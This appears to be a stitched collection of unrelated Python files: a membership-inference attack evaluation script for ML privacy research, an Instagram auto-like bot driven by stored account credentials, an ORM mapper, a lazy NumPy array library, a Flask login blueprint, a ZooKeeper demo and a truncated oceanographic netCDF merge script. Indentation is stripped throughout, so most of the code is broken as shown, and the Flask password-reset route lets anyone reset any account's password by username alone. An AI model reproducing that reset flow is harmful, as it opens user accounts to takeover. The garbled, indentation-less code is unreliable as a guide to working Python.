import argparse
import pandas as pd
import os
import sys
import numpy as np
import torch
from utils import computeMetricsAlt, evalThresholdAlt
from ModelShokri import DataHandler, TrainWBAttacker
from torch.utils.data import DataLoader
parser = argparse.ArgumentParser(description='Analyse criteria obtained from different MIAs.')
parser.add_argument('--model_type', type=str, help='Model Architecture to attack.')
parser.add_argument('--num_iters', type=int, default=20, help='Number of iterations for empirical estimation.')
parser.add_argument('--working_dir', type=str, default='./', help='Where to collect and store data.')
exp_parameters = parser.parse_args()
currdir = exp_parameters.working_dir
num_runs_for_random = exp_parameters.num_iters
model_type = exp_parameters.model_type
# Extracting intermediate outputs and gradients of the model
InterOuts_Grads0 = np.load(currdir + '/RawResults/NasrTrain0_' + model_type + '.npz')
InterOuts_Grads1 = np.load(currdir + '/RawResults/NasrTrain1_' + model_type + '.npz')
AdditionalInfo = np.load(currdir + '/RawResults/NasrAddInfo_' + model_type + '.npz')
inter_outs0 = []
inter_outs1 = []
out_size_list = AdditionalInfo['arr_0']
layer_size_list = AdditionalInfo['arr_1']
kernel_size_list = AdditionalInfo['arr_2']
n_inter_outputs = len(out_size_list)
n_layer_grads = len(kernel_size_list)
for i in range(n_inter_outputs):
inter_outs0.append(InterOuts_Grads0['arr_' + str(i)])
inter_outs1.append(InterOuts_Grads1['arr_' + str(i)])
lossval0 = InterOuts_Grads0['arr_' + str(n_inter_outputs)]
lossval1 = InterOuts_Grads1['arr_' + str(n_inter_outputs)]
labels1hot0 = InterOuts_Grads0['arr_' + str(n_inter_outputs + 1)]
labels1hot1 = InterOuts_Grads1['arr_' + str(n_inter_outputs + 1)]
grad_vals0 = []
grad_vals1 = []
for i in range(n_inter_outputs + 2, n_inter_outputs + 2 + n_layer_grads, 1):
grad_vals0.append(InterOuts_Grads0['arr_' + str(i)])
grad_vals1.append(InterOuts_Grads1['arr_' + str(i)])
# Our Analysis
FPR = np.linspace(0, 1, num=1001)
try:
dfMetricsBalanced = pd.read_csv(currdir + '/CompleteResults/BalancedMetrics_' + model_type + '.csv')
dfTPRBalanced = pd.read_csv(currdir + '/CompleteResults/BalancedROC_' + model_type + '.csv')
except FileNotFoundError:
dfMetricsBalanced = pd.DataFrame(columns=['Attack Strategy',
'AUROC', 'AUROC STD',
'Best Accuracy', 'Best Accuracy STD',
'FPR at TPR80', 'FPR at TPR80 STD',
'FPR at TPR85', 'FPR at TPR85 STD',
'FPR at TPR90', 'FPR at TPR90 STD',
'FPR at TPR95', 'FPR at TPR95 STD'])
dfTPRBalanced = pd.DataFrame(FPR, columns=['FPR'])
aux_list_metrics = []
aux_list_TPR = []
for k in range(num_runs_for_random):
np.random.seed(k)
indx_train0 = np.random.choice(lossval0.shape[0], size=4000, replace=False)
indx_train1 = np.random.choice(lossval1.shape[0], size=4000, replace=False)
indx_test0 = np.setdiff1d(np.arange(lossval0.shape[0]), indx_train0)
indx_test0 = np.random.choice(indx_test0, size=6000, replace=False)
indx_test1 = np.setdiff1d(np.arange(lossval1.shape[0]), indx_train1)
indx_test1 = np.random.choice(indx_test1, size=6000, replace=False)
trainingData = DataHandler(inter_outs0, inter_outs1, lossval0, lossval1, labels1hot0, labels1hot1,
grad_vals0, grad_vals1, indx_train0, indx_train1)
Max = trainingData.Max
Min = trainingData.Min
testingData = DataHandler(inter_outs0, inter_outs1, lossval0, lossval1, labels1hot0, labels1hot1,
grad_vals0, grad_vals1, indx_test0, indx_test1, Max=Max, Min=Min)
AttackerShokri = TrainWBAttacker(trainingData, testingData, out_size_list, layer_size_list, kernel_size_list)
dataloaderEval = DataLoader(testingData, batch_size=100, shuffle=False)
scoresEval = []
EvalY = []
with torch.no_grad():
for i, batch in enumerate(dataloaderEval):
example = batch[0]
target = batch[1]
scoresEval.append(AttackerShokri(*example).detach())
EvalY.append(target.cpu().data.numpy())
scoresEval = torch.cat(scoresEval, axis=0)
scoresEval = torch.squeeze(scoresEval)
scoresEval = scoresEval.cpu().data.numpy()
EvalY = np.squeeze(np.concatenate(EvalY, axis=0))
TPR_, metrics_ = computeMetricsAlt(scoresEval, EvalY, FPR)
aux_list_metrics.append(metrics_)
aux_list_TPR.append(TPR_)
metrics = np.stack(aux_list_metrics, 1)
mean_metrics = np.mean(metrics, 1)
std_metrics = np.std(metrics, 1)
new_row = {"Attack Strategy": 'Nasr White-Box',
'AUROC': mean_metrics[0], 'AUROC STD': std_metrics[0],
'Best Accuracy': mean_metrics[1], 'Best Accuracy STD': std_metrics[1],
'FPR at TPR80': mean_metrics[2], 'FPR at TPR80 STD': std_metrics[2],
'FPR at TPR85': mean_metrics[3], 'FPR at TPR85 STD': std_metrics[3],
'FPR at TPR90': mean_metrics[4], 'FPR at TPR90 STD': std_metrics[4],
'FPR at TPR95': mean_metrics[5], 'FPR at TPR95 STD': std_metrics[5]}
dfMetricsBalanced = pd.concat([dfMetricsBalanced, pd.DataFrame([new_row])], ignore_index=True)
TPR = np.stack(aux_list_TPR, 1)
mean_TPR = np.mean(TPR, 1)
std_TPR = np.std(TPR, 1)
dfTPRaux = pd.DataFrame(np.stack((mean_TPR, std_TPR), axis=1), columns=['Nasr White-Box TPR',
'Nasr White-Box TPR STD'])
dfTPRBalanced = dfTPRBalanced.join(dfTPRaux)
# Rezaei Analysis
try:
dfMetricsRezaei = pd.read_csv(currdir + '/CompleteResults/RezaeiMetrics_' + model_type + '.csv')
except FileNotFoundError:
dfMetricsRezaei = pd.DataFrame(columns=['Attack Strategy',
'Best Accuracy', 'Best Accuracy STD',
'FPR', 'FPR STD'])
aux_list_metrics = []
for k in range(num_runs_for_random):
np.random.seed(k)
indx_train0 = np.random.choice(lossval0.shape[0], size=8000, replace=False)
indx_train1 = np.random.choice(lossval1.shape[0], size=40000, replace=False)
indx_test0 = np.setdiff1d(np.arange(lossval0.shape[0]), indx_train0)
indx_test0 = np.random.choice(indx_test0, size=2000, replace=False)
indx_test1 = np.setdiff1d(np.arange(lossval1.shape[0]), indx_train1)
indx_test1 = np.random.choice(indx_test1, size=10000, replace=False)
trainingData = DataHandler(inter_outs0, inter_outs1, lossval0, lossval1, labels1hot0, labels1hot1,
grad_vals0, grad_vals1, indx_train0, indx_train1)
Max = trainingData.Max
Min = trainingData.Min
testingData = DataHandler(inter_outs0, inter_outs1, lossval0, lossval1, labels1hot0, labels1hot1,
grad_vals0, grad_vals1, indx_test0, indx_test1, Max=Max, Min=Min)
AttackerShokri = TrainWBAttacker(trainingData, testingData, out_size_list, layer_size_list, kernel_size_list)
dataloaderEval = DataLoader(testingData, batch_size=100, shuffle=False)
scoresEval = []
EvalY = []
for i, batch in enumerate(dataloaderEval):
example = batch[0]
target = batch[1]
scoresEval.append(AttackerShokri(*example).detach())
EvalY.append(target.cpu().data.numpy())
scoresEval = torch.cat(scoresEval, axis=0)
scoresEval = torch.squeeze(scoresEval)
scoresEval = scoresEval.cpu().data.numpy()
EvalY = np.squeeze(np.concatenate(EvalY, axis=0))
metrics_ = evalThresholdAlt(0.5, scoresEval, EvalY)
aux_list_metrics.append(metrics_)
metrics = np.stack(aux_list_metrics, 1)
mean_metrics = np.mean(metrics, 1)
std_metrics = np.std(metrics, 1)
new_row = {"Attack Strategy": 'Nasr White-Box',
'Best Accuracy': mean_metrics[0], 'Best Accuracy STD': std_metrics[0],
'FPR': mean_metrics[1], 'FPR STD': std_metrics[1]}
dfMetricsRezaei = pd.concat([dfMetricsRezaei, pd.DataFrame([new_row])], ignore_index=True)
print('Evaluation of Shokri White-Box: done')
sys.stdout.flush()
sys.stderr.flush()
if not os.path.exists(currdir + '/CompleteResults'):
os.makedirs(currdir + '/CompleteResults')
dfMetricsBalanced.to_csv(currdir + '/CompleteResults/BalancedMetrics_' + model_type + '.csv', index=False)
dfTPRBalanced.to_csv(currdir + '/CompleteResults/BalancedROC_' + model_type + '.csv', index=False)
dfMetricsRezaei.to_csv(currdir + '/CompleteResults/RezaeiMetrics_' + model_type + '.csv', index=False)
|
from InstagramAPI import InstagramAPI as IG
from pprint import PrettyPrinter
from getpass import getpass
from random import randint
from datetime import datetime
import time
import yaml
import os
# Auto-like IG posts of the target users listed in the config file
pp = PrettyPrinter(indent=2)
count = 0
d1 = int(time.time())
print("=================")
print("I N S T A G R A M")
print(" Auto Like Post! ")
print("=================")
yaml_config_file_path = os.path.join(os.path.abspath(
os.path.dirname(__file__)), 'maxigbot.yml')
with open(yaml_config_file_path) as config_file:
    bot_config = yaml.safe_load(config_file)
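# Illustrative layout of maxigbot.yml, inferred from the keys read below
# (the real file may carry additional settings):
#
# maxigbot:
#   auto-like-post:
#     account:
#       - username: your_ig_username
#         password: your_ig_password
#         target-user:
#           - some_target_username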
if len(bot_config) > 0:
print(">> Configuration file loaded.\n")
list_user = bot_config['maxigbot']['auto-like-post']['account']
print(">> Total IG user to process: {0}".format(len(list_user)))
fin_user = 0
for user in list_user:
api = IG(user['username'], user['password'])
api.login()
print(">> IG user '{0}' logged!".format(user['username']))
print(">> Total target user: {0}".format(len(user['target-user'])))
tot_target = len(user['target-user'])
fin_target = 0
for t_user in user['target-user']:
print(">> Now targeting user '{0}'.".format(t_user))
TARGET = {
'username': '',
'media': '',
'media_like': [],
}
TARGET['username'] = t_user
api.searchUsername(TARGET['username'])
TARGET['user_data'] = api.LastJson['user']
print(">> Checking '{0}' posts.".format(
TARGET['username']
))
print(">> Fetch '{1}' feed at {0}".format(
time.strftime("%d-%m-%Y %H:%M", time.localtime()),
t_user))
api.getUserFeed(str(TARGET['user_data']['pk']))
media = TARGET['media'] = api.LastJson['items']
print(">> Total '{0}' post: {1} posts.".format(
TARGET['username'],
len(TARGET['media'])
))
for item in media:
# print all payload from new feeds
# pp.pprint(item)
print("===========================================================")
if item['has_liked']:
print("User {1} with Post ID {0} has been liked.".format(
item['id'], t_user))
else:
ts = int(int(item['device_timestamp'])/1000000)
local_time = time.localtime(ts)
print("User ID : {0}".format(t_user))
print("Post ID : {0}".format(item['id']))
print("Post Time (Local) : {0}".format(
time.strftime("%d-%m-%Y %H:%M", local_time)))
print("Like Post : {0}".format(item['has_liked']))
print("Total like count : {0}".format(item['like_count']))
if 'carousel_media' in item:
list_img = item['carousel_media']
print("Carousel Img URL :")
for img in list_img:
print(
"\t* {0}".format(img['image_versions2']['candidates'][1]['url']))
else:
print(
"Sample Image URL :\n\t* {0}".format(item['image_versions2']['candidates'][1]['url']))
if item['caption'] is not None:
print("Post caption : {0}".format(
item['caption']['text'] or 'No caption!'))
hasLiked = api.like(item['id'])
if hasLiked:
print(">> You just liked this post at {0}".format(
time.strftime("%d-%m-%Y %H:%M", time.localtime())))
TARGET['media_like'].append(item['id'])
count = count + 1
print(">> Total auto post like : {0}".format(count))
rnd = randint(10, 20)
print(
">> Delay {0} secs for next post to like.".format(rnd))
time.sleep(rnd)
print(">> Process '{1}' to target user '{0}' done!".format(
t_user, user['username']))
fin_target = fin_target + 1
if fin_target < tot_target:
wait_next_target = randint(20, 30)
print(">> Wait {0} secs for next target user.\n".format(
wait_next_target))
time.sleep(wait_next_target)
else:
print(">> Done all target user for '{0}'.".format(
user['username']))
fin_user = fin_user + 1
if fin_user < len(list_user):
api.logout()
wait_next_user = randint(30, 45)
print(">> Wait {0} secs for next IG user process.\n".format(
wait_next_user))
time.sleep(wait_next_user)
else:
print("======================================================= END")
d2 = int(time.time())
print("All done in {0} secs".format(d2-d1))
|
"""
This file is part of the TheLMA (THe Laboratory Management Application) project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Organization mapper.
"""
from sqlalchemy.orm import column_property
from everest.repositories.rdb.utils import as_slug_expression
from everest.repositories.rdb.utils import mapper
from thelma.entities.organization import Organization
from thelma.repositories.rdb.mappers.utils import CaseInsensitiveComparator
__docformat__ = "reStructuredText en"
__all__ = ['create_mapper']
def create_mapper(organization_tbl):
"Mapper factory."
m = mapper(Organization, organization_tbl,
id_attribute='organization_id',
slug_expression=lambda cls: as_slug_expression(cls.name),
properties=dict(
name=column_property(
organization_tbl.c.name,
comparator_factory=CaseInsensitiveComparator
),
),
)
return m
|
# Copyright (C) 2020 by University of Edinburgh
from numbers import Number
from typing import Any, List, Tuple
import numpy as np # type: ignore
import numpy.lib.mixins # type: ignore
import delayrepay.backend as be
_backend = be.backend
def cast(func):
"""cast to Delay array decorator"""
def wrapper(*args, **kwargs):
arr = func(*args, **kwargs)
if not isinstance(arr, DelayArray):
arr = NPArray(arr)
return arr
return wrapper
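# Example of how `cast` is used further below (see the "Ones and zeros" and
# "From existing data" sections): plain backend constructors are wrapped so
# their results enter the delayed-evaluation graph, e.g.
#   zeros = cast(_backend.fallback.zeros)
#   z = zeros((3,))   # z is an NPArray node, not a raw ndarray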
class DelayArray(numpy.lib.mixins.NDArrayOperatorsMixin):
count = 0
def __init__(self, *args, **kwargs):
self._memo = None
self._count = DelayArray.count
DelayArray.count += 1
self._inputs = {}
def __repr__(self):
return str(self.__array__())
def __array__(self):
# return NumpyFunction(self.ex)()
try:
return self.array
except AttributeError:
self.array = _backend.run(self)
return self.array
def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
if len(inputs) > 1:
left = inputs[0]
right = inputs[1]
if not isinstance(left, Number) and not isinstance(right, Number):
if left.shape != right.shape:
if left.shape != (0,) and right.shape != (0,):
return ufunc_lookup[ufunc.__name__](
left.__array__(), right.__array__()
)
if ufunc.__name__ == "matmul":
return None
return self._dot(inputs, kwargs)
# cls = func_to_numpy_ex(ufunc)
args = [arg_to_numpy_ex(arg) for arg in inputs]
return create_ex(ufunc, args)
def _dot_mv(self, args, kwargs):
return MVEx(args[0], args[1])
def _dot_mm(self, args, kwargs):
return MMEx(args[0], args[1])
def __matmul__(self, other):
return self._dot([self, other], {})
@cast
def _dot(self, args, kwargs):
# scalar result dot
args = [arg_to_numpy_ex(arg) for arg in args]
# if is_matrix_matrix(args[0].shape, args[1].shape):
# return self._dot_mm(args, kwargs)
# if is_matrix_vector(args[0].shape, args[1].shape):
# return self._dot_mv(args, kwargs)
left = args[0].__array__()
right = args[1].__array__()
# TODO: independent fallback mechanism
return _backend.fallback.dot(left, right)
def __array_function__(self, func, types, args, kwargs):
if func.__name__ == "dot":
return self._dot(args, kwargs)
return HANDLED_FUNCTIONS[func](*args, **kwargs)
def __gt__(self, other):
return greater(self, other)
def __lt__(self, other):
return less(self, other)
def dot(self, other, out=None):
return self._dot(other, out)
def get(self):
arr = self.__array__()
try:
return arr.get()
except AttributeError:
return arr
def run(self):
self.__array__()
def reshape(self, *args, **kwargs):
return NPArray(self.__array__().reshape(*args, **kwargs))
def __setitem__(self, key, item):
arr = self.__array__()
if isinstance(key, DelayArray):
key = key.__array__()
if isinstance(item, DelayArray):
item = item.__array__()
arr[key] = item
@cast
def __getitem__(self, key):
if isinstance(key, DelayArray):
key = key.__array__()
arr = self.__array__()
return arr[key]
def var(self, *args, **kwargs):
return np.var(self, *args, **kwargs)
def sum(self, *args, **kwargs):
return np.sum(self, *args, **kwargs)
def __len__(self):
return self.shape[0]
@property
def T(self):
if len(self.shape) == 1:
return self
return np.transpose(self)
def repeat(self, *args, **kwargs):
return repeat(self, *args, **kwargs)
# delayrepay CG stuff
@property
def name(self):
return f"arr{self._count}"
@property
def inputs(self):
return {self.name: self}
Shape = Tuple[int, int]
OPS = {
"matmul": "@",
"add": "+",
"multiply": "*",
"subtract": "-",
"true_divide": "/",
}
FUNCS = {
"power": "pow",
"arctan2": "atan2",
"absolute": "abs",
"sin": "sin",
"cos": "cos",
"tan": "tan",
"sqrt": "sqrt",
"log": "log",
# HACK
"negative": "-",
"exp": "exp",
"tanh": "tanh",
"sinh": "sinh",
"cosh": "cosh",
}
ufunc_lookup = {
"matmul": _backend.np.matmul,
"add": _backend.np.add,
"multiply": _backend.np.multiply,
"subtract": _backend.np.subtract,
"true_divide": _backend.np.true_divide,
}
def calc_shape(left, right, op=None):
if left == (0,):
return right
if right == (0,):
return left
if op.__name__ in OPS:
return left
if op.__name__ == "dot":
# for now
if len(left) > 1 and len(right) > 1:
return (left[0], right[1])
elif len(left) > 1:
return (left[0],)
else:
return (0,)
else:
return left
class Memoiser(type):
"""Metaclass implementing caching"""
def __new__(meta, *args, **kwargs):
cls = super(Memoiser, meta).__new__(meta, *args, **kwargs)
meta._cache = {}
return cls
def __call__(cls, *args):
if type(args[0]).__name__ == "ndarray":
key = id(args[0])
else:
key = hash(args)
if key not in cls._cache:
Memoiser._cache[key] = super(Memoiser, cls).__call__(*args)
return cls._cache[key]
def reset():
# hacks
Memoiser._cache.clear()
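# Effect of the memoisation above (illustrative): wrapping the same ndarray
# twice yields the same expression node, because the cache key is id(array).
#   a = np.ones(3)
#   assert NPArray(a) is NPArray(a)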
class NumpyEx(DelayArray, metaclass=Memoiser):
children: List["NumpyEx"]
"""Numpy expression"""
def __init__(self, children: List["NumpyEx"] = []):
super().__init__()
self.dtype = None
self.children = children
def __hash__(self):
"""
Should work because of the Memoizer
"""
return id(self)
@property
def inputs(self):
ret = {}
for child in self.children:
ret.update(child.inputs)
return ret
@property
def name(self):
assert(False, "should not be called")
return f"numex{self.count}"
class Funcable:
def to_op(self):
return OPS[self.func.__name__]
class ReduceEx(NumpyEx, Funcable):
def __init__(self, func, arg):
super().__init__(children=[arg])
self.func = func
self.shape = (0,)
# func: np.ufunc
# arg: NumpyEx
@property
def name(self):
return f"redex{self._count}"
class UnaryFuncEx(NumpyEx, Funcable):
def __init__(self, func, arg):
super().__init__(children=[arg])
self.func = func
self.shape = arg.shape
self.dtype = arg.dtype
def to_op(self):
return FUNCS[self.func.__name__]
@property
def name(self):
return f"unfunc{self._count}"
class BinaryFuncEx(NumpyEx):
def __init__(self, func, left, right):
super().__init__(children=[left, right])
self.func = func
self.shape = calc_shape(left.shape, right.shape, func)
self.dtype = calc_type(left, right)
def to_op(self):
return FUNCS[self.func.__name__]
@property
def name(self):
return f"binfun{self._count}"
def pow_ex(func, left, right):
if not isinstance(right, Scalar) or not isinstance(right.val, int):
return BinaryFuncEx(func, left, right)
ex = left
for i in range(right.val - 1):
# will give odd expression tree, but OK
ex = BinaryNumpyEx(np.multiply, ex, left)
return ex
def create_ex(func, args):
if func.__name__ in OPS:
return BinaryNumpyEx(func, *args)
if func.__name__ == "square":
return BinaryNumpyEx(np.multiply, args[0], args[0])
if len(args) == 1:
return UnaryFuncEx(func, *args)
if func.__name__ == "power":
return pow_ex(func, *args)
return BinaryFuncEx(func, *args)
class BinaryNumpyEx(NumpyEx, Funcable):
"""Binary numpy expression"""
# TODO make properties for shape and dtype
def __init__(self, func, left, right):
super().__init__(children=[left, right])
self.func = func
self.shape = calc_shape(left.shape, right.shape, func)
self.dtype = calc_type(left, right)
@property
def name(self):
return f"binex{self._count}"
class MMEx(NumpyEx, Funcable):
# arg1: NumpyEx
# arg2: NumpyEx
def __init__(self, arg1, arg2):
super().__init__()
self.arg1 = arg1
self.arg2 = arg2
self.shape = calc_shape(arg1.shape, arg2.shape, np.dot)
class MVEx(NumpyEx, Funcable):
# arg1: NumpyEx
# arg2: NumpyEx
def __init__(self, arg1, arg2):
super().__init__()
self.arg1 = arg1
self.arg2 = arg2
self.shape = calc_shape(arg1.shape, arg2.shape, np.dot)
class DotEx(NumpyEx, Funcable):
def __init__(self, left, right):
super().__init__()
self.arg1 = left
self.arg2 = right
self.shape = calc_shape(left.shape, right.shape, np.dot)
self._inshape = left.shape
class NPArray(NumpyEx):
"""ndarray"""
def __init__(self, array):
super().__init__()
self.array = array
self.shape = array.shape
self.dtype = array.dtype
def __hash__(self):
return id(self.array)
def __eq__(self, other):
try:
return self.array is other.array
except AttributeError:
return False
def astype(self, *args, **kwargs):
old = self.array
cast_arr = self.array.astype(*args, **kwargs)
del NPArray._cache[id(old)]
NPArray._cache[id(cast_arr)] = self
self.array = cast_arr
self.dtype = cast_arr.dtype
return self
@property
def name(self):
return f"arr{self._count}"
@property
def inputs(self):
return {self.name: self}
class NPRef(NumpyEx):
"""Only for when breaking dependency chains for fusion"""
def __init__(self, node: NumpyEx, shape: Shape):
super().__init__()
self.ref = node
self.children = []
self.shape = shape
@property
def array(self):
return self.ref.array
class Scalar(NumpyEx):
"""a scalar"""
# val: Number
def __init__(self, val):
super().__init__()
self.val = val
self.shape = (0,)
def __hash__(self):
return hash(self.val)
@property
def name(self):
return str(self.val)
@property
def inputs(self):
return {}
def is_matrix_matrix(left, right):
return len(left) > 1 and len(right) > 1
def is_matrix_vector(left, right):
return len(left) > 1 and len(right) == 1
def calc_type(node1: NumpyEx, node2: NumpyEx) -> np.dtype:
if node1.dtype is not None:
node2.dtype = node1.dtype
return node1.dtype
node1.dtype = node2.dtype
return node2.dtype
def arg_to_numpy_ex(arg: Any) -> NumpyEx:
if isinstance(arg, DelayArray):
return arg
elif isinstance(arg, Number):
return Scalar(arg)
elif _backend.is_ndarray(arg):
return NPArray(arg)
else:
print(type(arg))
raise NotImplementedError
HANDLED_FUNCTIONS = {}
def implements(np_function):
"Register an __array_function__ implementation for DiagonalArray objects."
def decorator(func):
HANDLED_FUNCTIONS[np_function] = func
return func
return decorator
@implements(np.diag)
def diag(arr, k=0):
if isinstance(arr.ex, NPArray):
arr._ndarray = np.ascontiguousarray(np.diag(arr._ndarray, k))
assert arr._ndarray.flags["C_CONTIGUOUS"]
arr.ex = NPArray(arr._ndarray)
return arr
else:
return NotImplemented
@implements(np.diagflat)
@cast
def diagflat(arr, k=0):
# keep it simple for now
return np.diagflat(np.asarray(arr, order="C"))
@implements(np.var)
def var(arr, *args, **kwargs):
return _backend.fallback.var(arr.__array__(), *args, **kwargs)
@implements(np.sum)
def sum(arr, *args, **kwargs):
return _backend.fallback.sum(arr.__array__(), *args, **kwargs)
@implements(np.transpose)
@cast
def transpose(arr, *args, **kwargs):
return _backend.fallback.transpose(arr.__array__(), *args, **kwargs)
@implements(np.roll)
@cast
def roll(arr, *args, **kwargs):
return _backend.fallback.roll(arr.__array__(), *args, **kwargs)
@implements(np.max)
def max(arr, *args, **kwargs):
return _backend.fallback.max(arr.__array__(), *args, **kwargs)
@cast
@implements(np.maximum)
def maximum(arr, *args, **kwargs):
return _backend.fallback.maximum(arr.__array__(), *args, **kwargs)
@implements(np.average)
def average(arr, *args, **kwargs):
return _backend.fallback.average(arr.__array__(), *args, **kwargs)
@implements(np.repeat)
@cast
def repeat(arr, *args, **kwargs):
return _backend.fallback.repeat(arr.__array__(), *args, **kwargs)
@cast
@implements(np.cumsum)
def cumsum(arr, *args, **kwargs):
return _backend.fallback.cumsum(arr.__array__(), *args, **kwargs)
@implements(np.greater)
def greater(arr1, arr2, *args, **kwargs):
return _backend.fallback.greater(arr1.__array__(), arr2, *args, **kwargs)
@implements(np.less)
def less(arr1, arr2, *args, **kwargs):
return _backend.fallback.less(arr1.__array__(), arr2, *args, **kwargs)
add = np.add
multiply = np.multiply
dot = np.dot
cos = np.cos
sin = np.sin
tan = np.tan
tanh = np.tanh
sinh = np.sinh
cosh = np.cosh
arctan2 = np.arctan2
subtract = np.subtract
exp = np.exp
log = np.log
power = np.power
sqrt = np.sqrt
square = np.square
abs = np.abs
newaxis = _backend.fallback.newaxis
# dtypes etc.
double = np.double
float32 = np.float32
uint32 = np.uint32
# Ones and zeros
empty = cast(_backend.fallback.empty)
empty_like = cast(_backend.fallback.empty_like)
eye = cast(_backend.fallback.eye)
identity = cast(_backend.fallback.identity)
ones = cast(_backend.fallback.ones)
ones_like = cast(_backend.fallback.ones_like)
zeros = cast(_backend.fallback.zeros)
zeros_like = cast(_backend.fallback.zeros_like)
full = cast(_backend.fallback.full)
full_like = cast(_backend.fallback.full_like)
@implements(np.tile)
@cast
def tile(arr, *args, **kwargs):
if isinstance(arr, DelayArray):
temp = np.array(arr.__array__().get())
print(type(temp))
return _backend.fallback.tile(temp, *args, **kwargs)
# From existing data
array = cast(_backend.fallback.array)
asarray = cast(_backend.fallback.asarray)
asanyarray = cast(_backend.fallback.asanyarray)
ascontiguousarray = cast(_backend.fallback.ascontiguousarray)
asmatrix = cast(np.asmatrix)
copy = cast(_backend.fallback.copy)
frombuffer = cast(np.frombuffer)
fromfile = cast(np.fromfile)
fromfunction = cast(np.fromfunction)
fromiter = cast(np.fromiter)
fromstring = cast(np.fromstring)
loadtxt = cast(np.loadtxt)
# Numerical ranges
arange = cast(_backend.fallback.arange)
linspace = cast(_backend.fallback.linspace)
logspace = cast(_backend.fallback.logspace)
geomspace = cast(np.geomspace)
# Building matrices
tri = cast(_backend.fallback.tri)
tril = cast(_backend.fallback.tril)
triu = cast(_backend.fallback.triu)
vander = cast(np.vander)
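# Illustrative usage sketch (assumes the configured backend exposes a working
# NumPy-compatible fallback): arithmetic builds an expression tree that is
# only evaluated when the result is materialised.
#   a = ones((4,))
#   b = full((4,), 2.0)
#   expr = a * b + 3.0          # BinaryNumpyEx nodes, nothing computed yet
#   result = expr.__array__()   # _backend.run(...) evaluates the whole tree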
|
from flask import Blueprint, render_template, abort, request, redirect, url_for, flash
from jinja2 import TemplateNotFound
from flask_login import current_user, logout_user, login_user, login_required
from .auth_forms import RegisterForm, LoginForm, ResetPasswordForm
from ..models import db, User, Post, Category
auth_bp = Blueprint("auth_bp", __name__)
@auth_bp.route('/register', methods=['GET', 'POST'])
def register():
if not current_user.is_anonymous:
return redirect(url_for("main_bp.index"))
form = RegisterForm()
if form.validate_on_submit():
user = User(name=form.username.data, email=form.email.data)
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
return redirect(url_for('auth_bp.login'))
return render_template('auth/register.html', form=form)
@auth_bp.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_anonymous:
form = LoginForm()
if request.method == 'POST' and form.validate_on_submit():
user = User.query.filter_by(name=form.username.data).first()
if (user is None) or (not user.check_password(form.password.data)):
flash('Invalid username or password')
return redirect(url_for('auth_bp.login'))
login_user(user, remember=form.remember_me.data)
return redirect(url_for('main_bp.index'))
return render_template('auth/login.html', form=form)
else:
return redirect(url_for("main_bp.index"))
@auth_bp.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for("main_bp.index"))
@auth_bp.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
if not current_user.is_anonymous:
return redirect(url_for("main_bp.index"))
form = ResetPasswordForm()
if form.validate_on_submit():
user = User.query.filter_by(name=form.username.data).first()
if user is None:
flash(f"username:{form.username.data} doesn't exist")
return redirect(url_for('auth_bp.reset_password'))
user.set_password(form.password.data)
db.session.commit()
flash(f"username:{form.username.data} have changed your password.")
return redirect(url_for('auth_bp.login'))
return render_template('auth/reset_password.html', form=form)
|
import time
from kazoo.client import KazooClient
from kazoo.client import KazooState
import logging
logging.basicConfig()
def my_listener(state):
if state == KazooState.LOST:
# Register somewhere that the session was lost
print('The session is lost: %s' % str(state))
elif state == KazooState.SUSPENDED:
# Handle being disconnected from Zookeeper
print('The session is suspended: %s' % str(state))
else:
# Handle being connected/reconnected to Zookeeper
print('The session is reconnected: %s' % str(state))
zk = KazooClient(hosts='127.0.0.1:2181')
zk.start()
zk.add_listener(my_listener)
# Ensure a path, create if necessary
zk.ensure_path("/dragonflow/table1")
@zk.ChildrenWatch("/dragonflow")
def watch_children(children):
print("Children are now: %s" % children)
# Above function called immediately, and from then on whenever the children change
@zk.DataWatch("/dragonflow/table1/key1")
def watch_data(data, stat):
print("Data are now: %s" % data)
# Determine if a node exists
if zk.exists("/dragonflow/table1/key1"):
# Do something
# Print the version of a node and its data
data, stat = zk.get("/dragonflow/table1/key1")
print("Version: %s, data: %s" % (stat.version, data.decode("utf-8")))
# List the children
children = zk.get_children("/dragonflow/table1")
print("There are %s children with names %s" % (len(children), children))
# Update the data
zk.set("/dragonflow/table1/key1", b"value2")
# Print the version of a node and its data
data, stat = zk.get("/dragonflow/table1/key1")
print("Version: %s, data: %s" % (stat.version, data.decode("utf-8")))
else:
zk.create("/dragonflow/table1/key1", b"value1")
value = 0
while True:
time.sleep(1)
zk.set("/dragonflow/table1/key1", "%d" % value)
value = value + 1
|
"""
Background:
===========
CTDpNUT_ncgen.py
Purpose:
========
Creates EPIC-flavored, merged .nc files from downcast CTD and nutrient data.
Nutrient data is assumed to be on a sparse grid; it is scaled up to the full 1m grid of
the CTD data and then matched on depth. Finally, a new file is written (mirroring the
CTD file but with additional variables defined by the nut config file).
Todo: switch from EPIC to CF; copy global attributes and ctd files from CTD/Nut casts instead
of specifying config files.
File Format:
============
- S.Bell - epic ctd and epic nut data
- Pavlof DB for cruise/cast metadata
(Very Long) Example Usage:
==========================
History:
========
Compatibility:
==============
python >=3.6
python 2.7 - ?
"""
from __future__ import absolute_import, division, print_function
import argparse
import datetime
import os
import sys
from shutil import copyfile
import numpy as np
import pandas as pd
from netCDF4 import Dataset
import io_utils.ConfigParserLocal as ConfigParserLocal
import io_utils.EcoFOCI_netCDF_write as EcF_write
from calc.EPIC2Datetime import Datetime2EPIC, get_UDUNITS
from io_utils.EcoFOCI_netCDF_read import EcoFOCI_netCDF
__author__ = "Shaun Bell"
__email__ = "shaun.bell@noaa.gov"
__created__ = datetime.datetime(2018, 6, 14)
__modified__ = datetime.datetime(2018, 6, 14)
__version__ = "0.1.0"
__status__ = "Development"
__keywords__ = "netCDF", "meta", "header", "QC", "bottle", "discrete"
"""------------------------------- MAIN--------------------------------------------"""
parser = argparse.ArgumentParser(
description="Merge and archive nutrient csv data and 1m downcast data"
)
parser.add_argument(
"CruiseID", metavar="CruiseID", type=str, help="provide the cruiseid"
)
parser.add_argument(
"ctd_ncpath", metavar="ctd_ncpath", type=str, help="ctd netcdf directory"
)
parser.add_argument(
"nut_ncpath", metavar="nut_ncpath", type=str, help="nutrient netcdf directory"
)
parser.add_argument(
"output",
metavar="output",
type=str,
help="full path to output folder (files will be generated there",
)
parser.add_argument(
"config_file_name",
metavar="config_file_name",
type=str,
default="",
